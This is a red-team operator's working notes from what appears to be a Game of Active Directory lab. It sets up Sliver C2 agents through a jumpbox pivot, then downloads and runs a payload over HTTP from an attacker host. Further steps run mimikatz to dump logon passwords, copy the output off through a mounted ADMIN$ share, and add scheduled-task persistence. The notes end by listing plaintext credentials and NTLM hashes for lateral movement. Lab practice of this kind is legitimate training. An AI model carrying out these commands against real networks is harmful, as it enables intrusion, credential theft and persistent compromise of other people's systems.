17-03-2025 - Konstantinovitz

## Parked Ideas ## Objectives ## `jeor.mormont` - Is `Administrator` on [[[castleblack]]] - We need to get a remote shell access - Use remote shell to dump credentials on the DC enabling further compromise. - Unable to gain remote shell via winrm - Can execute commands using [[PsExec - TODO]] ### Setting up Sliver - we be piping all our traffic through the jumpbox. - ie. our sliver server will be behind the jumpox. - so how does the sliver agents actually reach the sliver server? - one option is to create a tcp pivot agent and deploy it on the jump box - have subsequent agents connect to that foca - alternatively we may be able to use the wireguard agents somehow??? - another option is to figure out how to leverage the jumpboxs wireguard server to route the c2 traffic back to us? - setup TCP listener on the jumpbox host, seems cleanest - gen payload for jumpbox (linux) - make sure to use the wireguard network IP for callback - gen payload for [[castleblack]], windows, use `generate --tcp-pivot $INTERNAL_JUMPBOX_ADDRESS` **Generating the jumpbox agent** ``` generate --os linux --skip-symbols --http 10.13.13.2 --name jumpbox ``` **Transfer to jumpbox** ``` scp -i /root/GOAD/workspace/02a4df-goad-azure/ssh_keys/ubuntu-jumpbox.pem ./jumpbox [email protected]:/home/goad/agent ``` **Start agent on jumpbox:** ``` # on the jumpbox ./agent # in the sliver console tcp pivot ``` **Generate payload for [[castleblack]]** ```sh generate --os windows --tcp-pivot 192.168.56.100:9898 --name castleblack --skip-symbols --debug ``` **Host the payload on the attacker machine:** ``` # start file server attacker machine python -m http.server 8000 # redirect to internal port socat TCP-LISTEN:8888,fork,reuseaddr TCP:127.0.0.1:8000 ``` **Using RDP to gain a semi interactive shell:** ```sh xfreerdp /u:$USER /p:$PASS /d:north.sevenkingdoms.local /v:castleblack ``` **Downloading the agent payload:** ``` curl http://192.168.56.100:8000/castleblack.exe -o C:\\tmp\\agent.exe ``` And finally execute the fokcer: ``` # from the RDP session C:\\tmp\\agent.exe ``` Let's drop mimikatz in there run it and prepare it for exfil: ``` # on castleblack through the RDP powershell terminal curl http://192.168.56.100:8888/mimikatz.exe mimikatz.exe "log sekurlsa.txt" "sekurlsa::logonpasswords" "exit" mv sekurlsa.txt C:\Windows\Temp\sekurlsa.txt ``` Let's make our lives a little easier, for both tool infill and loot exfill by mounting the [[SMB Share - ADMIN$]]: ```sh sudo mount -t cifs //192.168.56.22/ADMIN$ /mnt/castleblack-admin \ -o username=jeor.mormont,password=_L0ngCl@w_,domain=north.sevenkingdoms.local,vers=3.0 ``` Let's exfill that down to our attacker machine: ``` mv /mnt/castleblack-admin/Temp/sekurlsa.txt ./ ``` Id also like to add some sort of persistence (havent been tested yet): ```powershell schtasks /create /tn "Updater" /tr "C:\Users\jeor.mormont\agent.exe" /sc onlogon /rl highest /f ``` Well now we got creds n shit but still missing the AD GPO layout etc. - [[BloodHound]] would be very appropriate at this point... The next logical steps here: - Map out the AD GPO/setup using [[BloodHound]] - Figure out how to move onto the DC - Leverage NTLM hashes and crack passwords found in serkurlsa.txt - Add persistence (backdoor user once we pop the DC) ## Sekurlsa output for lateral movement ``` User: `sql_svc` NTLM: ``84a5092f53390ea48d660be52b93b804`` ser: `robb.stark` NTLM: `831486ac7f26860c9e2f51ac91e1a07a` ```